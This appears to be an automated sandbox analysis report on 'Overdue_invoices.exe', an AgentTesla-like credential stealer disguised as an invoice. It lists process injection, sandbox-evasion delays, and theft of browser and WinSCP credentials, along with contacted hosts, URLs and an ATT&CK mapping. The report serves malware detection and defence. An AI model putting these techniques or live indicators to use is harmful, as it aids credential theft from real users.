    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@4/4
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.logJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeMutant created: \Sessions\1\BaseNamedObjects\KKCDH7XDFH0WWL2TU813
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile created: C:\Users\user\AppData\Local\Temp\TMP_passJump to behavior
    Source: Overdue_invoices.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Overdue_invoices.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\Overdue_invoices.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Overdue_invoices.exeReversingLabs: Detection: 17%
    Source: unknownProcess created: C:\Users\user\Desktop\Overdue_invoices.exe 'C:\Users\user\Desktop\Overdue_invoices.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exeJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Overdue_invoices.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Overdue_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

    Data Obfuscation:

    barindex
    .NET source code contains potential unpackerShow sources
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs.Net Code: OnResolveAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 0_2_004032DC push 280A0000h; ret 0_2_004032E1
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 1_2_00DB32DC push 280A0000h; ret 1_2_00DB32E1
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeWindow / User API: threadDelayed 1508Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 2140Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 3492Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -100000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99875s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99766s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99657s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99500s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99391s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99281s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99172s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -99063s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Injects a PE file into a foreign processesShow sources
    Source: C:\Users\user\Desktop\Overdue_invoices.exeMemory written: C:\Users\user\Desktop\Overdue_invoices.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exeJump to behavior
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information:

    barindex
    Yara detected AgentTeslaShow sources
    Source: Yara matchFile source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
    Source: C:\Users\user\Desktop\Overdue_invoices.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)Show sources
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web dataJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

    Remote Access Functionality:

    barindex
    Yara detected AgentTeslaShow sources
    Source: Yara matchFile source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesInput Capture21Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3Input Capture21Virtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Credentials in Registry1Process Discovery11SMB/Windows Admin SharesData from Local System1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery23Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Overdue_invoices.exe17%ReversingLabsByteCode-MSIL.Trojan.Generic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    1.2.Overdue_invoices.exe.400000.0.unpack100%AviraHEUR/AGEN.1106066Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://icanhazip.com40%Avira URL Cloudsafe
    https://cdn.ecosia0%Avira URL Cloudsafe
    https://raw.githubusercontenPf~0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#0%Avira URL Cloudsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
    https://raw.githubusercontenP0%Avira URL Cloudsafe
    http://ns.adobe.c/g0%URL Reputationsafe
    http://ns.adobe.c/g0%URL Reputationsafe
    http://ns.adobe.c/g0%URL Reputationsafe
    http://ocsp.pki.goog/gsr2020%URL Reputationsafe
    http://ocsp.pki.goog/gsr2020%URL Reputationsafe
    http://ocsp.pki.goog/gsr2020%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://raw.githubusercontent.com/pandalog/nothing/master/john.txt0%Avira URL Cloudsafe
    https://raw.githubusercontent.com0%Avira URL Cloudsafe
    http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
    http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
    http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
    https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.html0%Avira URL Cloudsafe
    http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html0%Avira URL Cloudsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
    http://193.239.147.1030%Avira URL Cloudsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
    http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    github.map.fastly.net
    		151.101.0.133
    		truefalse
      		unknown
      smtp.gmail.com
      		108.177.119.109
      		truefalse
        		high
        icanhazip.com
        		147.75.47.199
        		truefalse
          		high
          raw.githubusercontent.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://icanhazip.com/false
              		high
              http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.htmlfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabOverdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                		high
                http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeOverdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                    		high
                    http://icanhazip.com4Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://bit.ly/icanhazip-faqOverdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmpfalse
                      		high
                      https://cdn.ecosiaOverdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                        		high
                        https://raw.githubusercontenPf~Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pki.goog/gsr2/GTS1O1.crt0Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://raw.githubusercontenPOverdue_invoices.exe, 00000001.00000002.626078559.00000000030F0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchOverdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                          		high
                          https://duckduckgo.com/chromOverdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                            		high
                            http://ns.adobe.c/gOverdue_invoices.exe, 00000001.00000002.625776172.00000000018C6000.00000004.00000040.sdmpfalse
